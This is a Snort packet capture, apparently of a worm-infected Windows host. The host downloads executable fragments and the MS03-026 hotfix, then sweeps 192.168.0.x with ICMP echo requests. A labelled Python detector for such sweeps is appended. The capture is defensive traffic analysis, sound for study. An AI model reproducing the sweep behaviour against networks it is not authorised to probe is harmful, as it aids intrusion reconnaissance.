..95(...^u..%(....3...|$...D$.u ..........t$.j.P.t$...L ..+......U......E....M.u..E...0@.+V3.j.^ ....0..A..u..E.I;..E.^r.....@I.U.;.s.. .....U.....V.u...... t..u ..u.V.5 ......!....u:.l....E...!...E..E..E.P.u..u.j.Vj.h.0....X ....u..u.V.R...^....SUVWh......p ...(...3.;.t.P..T ...-(....5... ...l ......../.F.;.t&P..h ....u...d .....t....t.j.U. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.843419 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:3417 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE55CB9 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 v....n..6;.u..5.....-` ........-.F...t$P....u...d .....t....t.j. j..v....f...6;.u.........t.P..T ..............V....u...d .....t. ...t.j.j.V..h......\ .._^][.U...}..tj.}..tA.}.....uW.=8.....E..d ...t.j.P.. !..h.....p.....| ...5t.....x ...5.}..t.............t! j.P..t ....3....%d....j..u....!..3.@]....D$.V......... t....u.@. ...W.y...A..u.+.A......_r.3..4...."u#...."t ..F@....u..... t.... t...F@....u..&.3.@^...3.j...Z..t...5 .......Ju....@...A......r.. .T$....D$..L$.t.VW..1...3..4.@......3.AJu._^...U........S3.Sh... .j.Sj.h.....u.... ......E.......VW.=H ..S.M.Q.....V......QP..... .....9u.......f......MZu@SS..(....u...L ..;.(.....x...S.E.PV.... ..P.u.......^...9u...U.........PE....E...f..........6...9]...-.. .9]...$....}............u.j..5....... ....;..u.......SS.u..u...L ..;E.......S.E.P.u.V.u............M.9M..........M.....=.8.u0j.Y ..!....3...u .H.....M.r.;M.w.QPj..Z.....t..E.@.M..}...E.s..o.... M....t..}......M.....FA9].u..M..}.....Q..A......;..U..E...0....= . .....M..E......;..U.......f...........B..........R.........M.. .;M..M........M...f.\F..E...@.j...f.\A.X+.f.._.+.f..X.+.f..F.+.f ..S.+..E.PSSSj.VSSf.._...;..E.......9].u|Pj..5....... ..;..E.toS S.u.Pj.VSS..SS.u.... ....uJ.E.PSSSj..u.SS..;..E.t39].u.Pj..5.... ... ....;.t"SS.u.Vj..u.SS..V.u.... ...M........u...T .._^[....U. .....E...E..E.V3.+..E......U.t.HuY!u....E......E.Pj(j...T!....|; .}...E.t...t..0P.u..E.VPj..u...X!.....u.|...\!..3.@....\!..3.^.. 
..U..QV3.9u.t:.E.Pj(j...T!....|(VVV.u.V.u...X!.....u =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.844179 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:178 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BE55CB9 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.849443 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:3673 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE5626D Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 .|...\!..3.@....\!..3.^....3...QU3.UUh.!..... ..........VW.....V h.!..h.....*...Uh....j.Uj.h....V... .............toS.@...3.U.... ......D$.P.....WSR..@...Sdwn..D.........H.......... ....[t.9|$.u .Vh.!..... .....5......T ........._^]Y.U.l$.......V.u|...u...d . ....= ....uL......Ph....V.f....e..h.....E.Ph... .5 ......!..h... ..E.P......P.5d.....$!.........u.F.=$....t.h....... ...%$....V.. . ...j.h.&..j.jd.5 ......!...%d......t.j..9......U.l$.......SVh. !..3.Sh.....E`....... ....;.t.h`...V... ..V..T ....9]tt.h`.....h .'....| ...E`P.EPPSj..0...........Wh.!..... ..;..Ett"h.!..P... . .;.t..u|.ul.upS.uxS.....ul.upSSS... ....;........5D ...E.P.E.... ....}..v..E.P.E........EL@tlh..........P... ....tV......j\P..8!. .YYSh....j.Sj..X.h..........P... .......t.V... ..V....T ..;.t.j. ..P!....9]tt..ut... ...EPP......._^[..d.....t$.j..5....... ....u .j.......Vj.h....j.j.j.h.....t$ ... .......u.P.t...j.j..5....V.. L ....^.U..j..E.P.u..u..u...H ....u.j..<....E.].U..j..E.P.u..u.. u.... ....u.j.......E.].U.....W.u..e...e...e...e...e..3.WWWWWWh ...j j..E.P.E....$ ....t..E.Pj(... ..P... ....u.3......S.. ..V. E.Ph....h ...j..u.....u.3.......5 ...... ....V.....;.Y.M...tO... 5 ...............E.Ph....h ......j....u.....t..5 ...... ....V.i. ....Y.M...u.j.........5 .................3...@^[_.....D$..H...@. .u.V+..p.WV.....Y...t$................._^...U....(....E....SV..I ...-..........Hu...E.H......H..).....kt.3..+...Wh..........Ph... 
.5 ...3..........!...u.j.3.Y.}..........E........E. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.849534 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:3929 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE56821 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 3..E.GP.u..}....!..;.t%......QP...!....t.......PSj.jlV..,!..SSj( V..(!...._..................Ph....j.jl.u...,!........P.....P.\h. .........Ph... .5 ......!........P3.Sj..u...(!...5,!........PSj. jg.u...h....Sj.jl.u.....j..u....!..3.@^[.......SUVWh.........V3. S... .....H...@:.u.+..........H..9\t...;.w.P.....V.4....K...... .....l$.3..E.< t.<.t.<"u.<"u.3.AE..;..l$.t.8]...t..8"t.@8.u..... ...H...@:.u.+..D(....... t....u...H;.s...4......\$........p...@ :.u.+..T.....:.t.J;.w..2...p...@:.u.+..H..D$.................... ......4.....,....!..8]............. .. :........n..q...3.:.t.EF. ..U..... .. :.t.3.:........}...\$.uC9\$.v=3.9\$..D$.....v)..-... .........0.... .. :.......G;|$.r.3..l$..E.< t.<.t.:.ud.t$...+... ......`..............3.9\$...`.....u$.L$.....................L$. 3....`...R... ....t$..4....t$.F8..t$.........3..\$..o....-,....- ,......P...@:.u.+...........x..w.u.......3...... @.. -X u..0.... . -X:u..0....E.P.+.....tJ3.@.. -U u.. ..... -Q u..8.... ..... -S u..h..... -S:u..h...OE;.w._^][....jR.I....Vj......Y.t$....B.... F..D$......0^...U..3.9E.V...W.}..?....E.t1.>\u&.u..&.W... ....t. Wh..........E.......\F.>.u..E._^]...U........V.u...W.P...@..u.+. .H.............................x.\_^t...\.`...u........u.P.Q.... .tO......P... .....t=..t9h.!..... ....t%h."..P... ....t.j....... Q....u...d ..3.@..3.....U.l$.......SW3..=......E..Epc:\..Ewc.}\. }`.}d.E,.....E0.}4.}X.....t.WWS............. ......EhP.ETP.E8P.. .....u.j......Vj..E.P... ....t}j.h..........P... ... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Download the patches for the MS03-026 vulnerability

08/19-15:17:14.564592 202.181.234.24:80 -> 192.168.20.2:1036
TCP TTL:61 TOS:0x0 ID:32092 IpLen:20 DgmLen:1500
***A**** Seq: 0x6BF8EA3E Ack: 0x734A92AA Win: 0x4000 TcpLen: 20
................................................................
............................. .......0.....*.H..........0......1
.0...*.H.......0g..+.....7....Y0W03..+.....7...0%.... .....<.<.<
.O.b.s.o.l.e.t.e.>.>.>0 0...*.H..........~b^C.s;;.m._.......0...
0..%..J..8..Y..]s_.]..0...*.H........0..1.0...U....VeriSign Trus
t Network1.0...U....VeriSign, Inc.1,0*..U...#VeriSign Time Stamp
ing Service Root1402..U...+NO LIABILITY ACCEPTED, (c)97 VeriSign
, Inc.0...970512000000Z..040107235959Z0..1.0...U....VeriSign Tru
st Network1.0...U....VeriSign, Inc.1,0*..U...#VeriSign Time Stam
ping Service Root1402..U...+NO LIABILITY ACCEPTED, (c)97 VeriSig
n, Inc.0..0...*.H............0........ .h|,-...........W.S.u..3*
....[4.........Z.........%.}X.sjx.q...X.).X^...-b.X...q.."X/....
.6....MJ..;".V.~!.l..JG.j..6...-..9......0...*.H............aU.>
{...~..."....+[.D..x..~...r..Y......L.Na....F=P4..pV..*....c.yi.
s...(......].........(..y).....gBH.....a..S...s?...O..U...cc0...
0..k........zm\ob.O...C....0...*.H........0..1.0...U....VeriSign
 Trust Network1.0...U....VeriSign, Inc.1,0*..U...#VeriSign Time 
Stamping Service Root1402..U...+NO LIABILITY ACCEPTED, (c)97 Ver
iSign, Inc.0...010228000000Z..040106235959Z0..1.0...U....VeriSig
n, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use 
at https://www.verisign.com/rpa (c)011'0%..U....VeriSign Time St
amping Service0.."0...*.H.............0.........za.....c.+.a....
....=.'...9...)..fH..O..O...^./......{.!....N....X.c =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.564667 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:32348 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BF8EFF2 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 -...)..p.P....@..%.BU.........1....L.$*.........M.......h.aX.r.. 0HO./oc ....{.K.(..h...@.F:..?6.L.TBZze{....GT..=......3...*...^ :......u..k.=.`.B..O.[.?"1....s.....+.F.Lm..P..K*x..t=..,G1..... ...0..0@..+........40200..+.....0..$http://ocsp.verisign.com/ocs p/status0...U....0.0D..U. .=0;09..`.H...E....0*0(..+.........htt ps://www.verisign.com/rpa0...U.%..0...+.......0...U........0...* .H............-.Oc`,...$.R.....g..#..F...M..|z 02.h...2....;..'{ >....!.......@W..%....j..;..#..)]@U..S..6:9e.ss.2......<.E....$. .c........A.j.0...0..............<<...>.c..@0...*.H........0p1+0 )..U..."Copyright (c) 1997 Microsoft Corp.1.0...U....Microsoft C orporation1!0...U....Microsoft Root Authority0...970110070000Z.. 201231070000Z0p1+0)..U..."Copyright (c) 1997 Microsoft Corp.1.0. ..U....Microsoft Corporation1!0...U....Microsoft Root Authority0 .."0...*.H.............0............p.;.N.(..x^0....%_...L..... >|Q....`2k.Bdy..v.T.........f..kzb#..<........-f..h&..:,...X&.F. .>8.,.(9..I.B.....lUa..|.`-wL...d;.P.1.$.....+..=.c.`X.e..7R.... ......UE....:.T.N...zmtN.....(!.W.`i7.K..<V.[..f.....VW..;^..w.. ............r\<....."0..... w...........0..0....U.....0....[.p.i r.#Q~..M....r0p1+0)..U..."Copyright (c) 1997 Microsoft Corp.1.0. ..U....Microsoft Corporation1!0...U....Microsoft Root Authority. .....<<...>.c..@0...*.H.....................5...$.w..\`2....>... ..:.!..W.,..G.b....;;Z.6Ti.$m?.....|.1.=..pj...O.i...C..Z O.b{.. ..+7%-.e...%.c..T..!....R.nC2......gl.Q...R....0. 1. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.564795 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:32604 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BF8F5A6 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 ...).M.........[....W.eI.RT...(.......~....7,.z..w.v...j?..6..A. .5j.j.5......E..Z38nM..b......T?F..U.p..:..u....0...0..........j ..O......0..`..0...*.H........0p1+0)..U..."Copyright (c) 1997 Mi crosoft Corp.1.0...U....Microsoft Corporation1!0...U....Microsof t Root Authority0...990701070000Z..051015070000Z0..1.0...U....US 1.0...U....WA1.0...U....Redmond1.0...U....Microsoft Corporation1 +0)..U..."Copyright (c) 1999 Microsoft Corp.1806..U.../Microsoft Windows Verification Intermediate PCA0.. 0...*.H.............0. ..........j6.{?.......`QQ`o..0.......Wj.....T-.f.q.?.....N|.m.R. ..0..5.-......#..-9`..c..*..U;.<..yYmF.......\U=..a.~7....8`.$.. O..(5..FN!..?7.F....O......<..qc.%t.!m...m.IJ..2..}......f.... . $d..bt..=.../M.t../3.ay......u...be.t.......gx#E|....@.....+.... .]............0...0...U.%..0...+.....7.....+.......0....U.....0. ...[.p.ir.#Q~..M....r0p1+0)..U..."Copyright (c) 1997 Microsoft C orp.1.0...U....Microsoft Corporation1!0...U....Microsoft Root Au thority......<<...>.c..@0...+.....7.......0...+.....7.......S.u. b.C.A0...U.......F0...U.......0....0...*.H.............c.9d..... 6c#jL.Em..9L.._...K.D.b...N....&..i>/......H...#g.4)....zh...... T.Y<.&.e...x..hy.9.........O..1.&....G....$....o.a.nO.69....6gK. ........!Z@;.....8...........{%..........M....W...J.,.Q..9.....- .@\$O7t^>.....,...`)..-...... ...,I.p...P.f:=.:.1..._.W0...0.... ......a.;q.....'0...*.H........0..1.0...U....US1.0...U....WA1.0. ..U....Redmond1.0...U....Microsoft Corporation1+0).. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.564919 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:32860 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BF8FB5A Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 U..."Copyright (c) 1999 Microsoft Corp.1806..U.../Microsoft Wind ows Verification Intermediate PCA0...020529193240Z..030729194240 Z0..1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U. ...Microsoft Corporation1+0)..U..."Copyright (c) 2002 Microsoft Corp.1'0%..U....Microsoft Windows XP Publisher0.."0...*.H....... ......0.........H....@).I.ir... R.3...........g..N...........'c. .Q9.7...M.b...... 5.=.V..Lj.....N..I..d.......GH.N5...g.S.B..R.. ..Q*....U......Jf.dw...r3...n.r@..nJ.......I5v8H+...d...&....... {............F..."'.+.!....S........h.B.h.U..:.eO..........j.d.. ...,.!......+n.........,0..(0...U...........0...U.%..0...+...... ...+.....7...0....U.#...0........N................t.r0p1+0)..U.. ."Copyright (c) 1997 Microsoft Corp.1.0...U....Microsoft Corpora tion1!0...U....Microsoft Root Authority..j..O......0..`..0I..U.. .B0@0>.<.:.8http://crl.microsoft.com/pki/crl/products/WindowsPCA .crl0...*.H..............Y.Mz..T~.A.<...e.....d...^..}v_......{. .6o\.7.. .-...s........r.I.6.>..u........utj.m.[G.7....g...mjP!. ....r..i!.8^...R...9..U..2.../..._.7.Y.Y....u....h.S....n...o*"p ..:.}.f..=.........=o..N....>.ss.........(..7....P.p..W.....G.I. f,q.....h.....*..d..D...1...0......0..0..1.0...U....US1.0...U... .WA1.0...U....Redmond1.0...U....Microsoft Corporation1+0)..U..." Copyright (c) 1999 Microsoft Corp.1806..U.../Microsoft Windows V erification Intermediate PCA..a.;q.....'0...*.H...........0...*. 
H......1...+.....7...0...+.....7...1.0...+.....7...0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.565022 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:33116 IpLen:20 DgmLen:1237 ***AP*** Seq: 0x6BF9010E Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 ...*.H......1....l..#|.....D.W..0h..+.....7...1Z0X.:.8.W.i.n.d.o .w.s. .X.P. .H.o.t.f.i.x. .-. .K.B.8.2.3.9.8.0....http://www.mic rosoft.com0....+.....7..1..0.....0... 0...+.....7..0....0...appl et0.0...0...+.....7..0...........0...+.....7.......!0...+.....7. .0.....................0...+.....7..0.......0...0...+.....7..0.. ..........0...*.H............Ww!|c.>........H.T.....W\W^q..g.f.. ..).O..t......+d..z}.~.gn.S.=.3.aIF..(..s.".$I..o..w.6fO..~..n.w .-......V.d...].....N.3.)....d....q....h...........\...[Q ..v... .(.M.EK..q).M..Z..+...W.5....W..Pj...i...9.:.0j...d....5<e(;d... j\.....H...%t'..<..h..G..Uj.....L0..H..*.H......1..90..5...0..0. .1.0...U....VeriSign Trust Network1.0...U....VeriSign, Inc.1,0*. .U...#VeriSign Time Stamping Service Root1402..U...+NO LIABILITY ACCEPTED, (c)97 VeriSign, Inc....zm\ob.O...C....0...*.H........ Y0...*.H......1...*.H......0...*.H......1...030705201853Z0...*.H ......1....=U.iV.....x`j.X0...*.H.............B....LyU.W9....s.. |....X.?.&....>.*\..}..y.....54......'J.Jc...c..........G....... ..H[.....o^.R.}D;.8..*.......6...sO.&......c..Y..M.Q...w.L.2.... 
G...._..>..\..e....Br..@....D........XG=.=..!M....C.1.i...#A...~
.......4.#........AQp.E.9..x...z.....n....9v_
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:14.565309 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:731 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x734A92AA Ack: 0x6BF8D922 Win: 0xF53C TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:14.565357 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:732 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x734A92AA Ack: 0x6BF8E48A Win: 0xE9D4 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:14.565412 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:733 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x734A92AA Ack: 0x6BF8EFF2 Win: 0xDE6C TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:14.565966 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:734 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x734A92AA Ack: 0x6BF8F5A6 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:14.566609 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:735 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x734A92AA Ack: 0x6BF9010E Win: 0xEF88 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:14.567416 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:736 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x734A92AA Ack: 0x6BF905BB Win: 0xF98B TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:24.802296 202.181.234.24:80 -> 192.168.20.2:1036
TCP TTL:61 TOS:0x0 ID:33372 IpLen:20 DgmLen:40
***A***F Seq: 0x6BF905BB Ack: 0x734A92AA Win: 0x4000 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:24.802686 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:737 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x734A92AA Ack: 0x6BF905BC Win: 0xF98B TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:29.540836 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:738 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x734A92AA Ack: 0x6BF905BC Win: 0x0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Finish downloading the patch. After two minutes, start the ICMP scan

08/19-15:19:22.148515 192.168.20.2 -> 192.168.0.0
ICMP TTL:128 TOS:0x0 ID:27 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:256 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.154455 192.168.20.2 -> 192.168.0.1
ICMP TTL:128 TOS:0x0 ID:28 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:512 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.164797 192.168.20.2 -> 192.168.0.2
ICMP TTL:128 TOS:0x0 ID:29 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:768 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.174535 192.168.20.2 -> 192.168.0.3
ICMP TTL:128 TOS:0x0 ID:30 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:1024 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.184530 192.168.20.2 -> 192.168.0.4
ICMP TTL:128 TOS:0x0 ID:31 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:1280 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.194525 192.168.20.2 -> 192.168.0.5
ICMP TTL:128 TOS:0x0 ID:32 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:1536 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.205040 192.168.20.2 -> 192.168.0.6
ICMP TTL:128 TOS:0x0 ID:33 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:1792 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.214541 192.168.20.2 -> 192.168.0.7
ICMP TTL:128 TOS:0x0 ID:34 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:2048 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.224469 192.168.20.2 -> 192.168.0.8
ICMP TTL:128 TOS:0x0 ID:35 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:2304 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.234570 192.168.20.2 -> 192.168.0.9
ICMP TTL:128 TOS:0x0 ID:36 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:2560 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:19:22.244549 192.168.20.2 -> 192.168.0.10
ICMP TTL:128 TOS:0x0 ID:37 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:2816 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
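
Added example, not part of the original capture: a Python parser for Snort ASCII records in the layout shown above that flags the ICMP echo sweep starting at 15:19:22, where 192.168.20.2 sends 92-byte echo requests to consecutive addresses about 10 ms apart. The function names, the 1-second window and the 10-target threshold are assumptions chosen for illustration; the year 2003 is taken from the HTTP Date header in the capture, because Snort timestamps carry no year.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from ipaddress import IPv4Address
from typing import Optional

SEP = "=+" * 37  # record separator in the style of the capture
# Headers copied from the capture above (payload omitted), one record each.
SAMPLE = f"\n{SEP}\n".join([
    "08/19-15:17:29.540836 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 "
    "TOS:0x0 ID:738 IpLen:20 DgmLen:40 DF *****R** Seq: 0x734A92AA Ack: 0x6BF905BC "
    "Win: 0x0 TcpLen: 20",
] + [
    f"08/19-15:19:22.{usec} 192.168.20.2 -> 192.168.0.{host} ICMP TTL:128 TOS:0x0 "
    f"ID:{27 + host} IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:{256 * (host + 1)} ECHO"
    for host, usec in enumerate(["148515", "154455", "164797", "174535", "184530",
                                 "194525", "205040", "214541", "224469", "234570",
                                 "244549"])
])

RECORD_SPLIT = re.compile(r"(?:=\+){8,}")
HEADER = re.compile(
    r"(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d{6})\s+"
    r"(?P<src>\d+(?:\.\d+){3})(?::\d+)?\s+->\s+"
    r"(?P<dst>\d+(?:\.\d+){3})(?::\d+)?\s+"
    r"(?P<proto>ICMP|TCP|UDP)\s+TTL:\d+.*?DgmLen:(?P<dgmlen>\d+)", re.S)
ICMP_TYPE = re.compile(r"Type:(\d+)\s+Code:\d+")


@dataclass
class Packet:
    ts: datetime
    src: IPv4Address
    dst: IPv4Address
    proto: str
    dgm_len: int
    icmp_type: Optional[int]


def parse_snort(text, year=2003):
    """Parse records whether header fields sit on one line or on several."""
    packets = []
    for record in RECORD_SPLIT.split(text):
        m = HEADER.search(record)
        if not m:
            continue
        icmp_type = None
        if m["proto"] == "ICMP":  # only look for Type: in ICMP headers, never in payload
            t = ICMP_TYPE.search(record, m.end())
            icmp_type = int(t.group(1)) if t else None
        ts = datetime.strptime(f"{year}/{m['ts']}", "%Y/%m/%d-%H:%M:%S.%f")
        packets.append(Packet(ts, IPv4Address(m["src"]), IPv4Address(m["dst"]),
                              m["proto"], int(m["dgmlen"]), icmp_type))
    return packets


def find_echo_sweeps(packets, window_s=1.0, min_targets=10):
    """Report sources that ping at least min_targets distinct hosts within window_s."""
    by_src = defaultdict(list)
    for p in packets:
        if p.proto == "ICMP" and p.icmp_type == 8:  # echo request
            by_src[p.src].append(p)
    findings = []
    for src, echoes in by_src.items():
        echoes.sort(key=lambda p: p.ts)
        best, start = [], 0
        for end, pkt in enumerate(echoes):
            # Slide the window start forward until it spans at most window_s.
            while (pkt.ts - echoes[start].ts).total_seconds() > window_s:
                start += 1
            burst = echoes[start:end + 1]
            if len({p.dst for p in burst}) > len({p.dst for p in best}):
                best = burst
        targets = sorted({p.dst for p in best})
        if len(targets) < min_targets:
            continue
        findings.append({
            "src": str(src),
            "targets": len(targets),
            "first": str(targets[0]),
            "last": str(targets[-1]),
            # Consecutive addresses point to a scripted scan, not monitoring.
            "sequential": all(int(b) - int(a) == 1
                              for a, b in zip(targets, targets[1:])),
            "dgm_lens": sorted({p.dgm_len for p in best}),
        })
    return findings


if __name__ == "__main__":
    for finding in find_echo_sweeps(parse_snort(SAMPLE)):
        print(finding)
```
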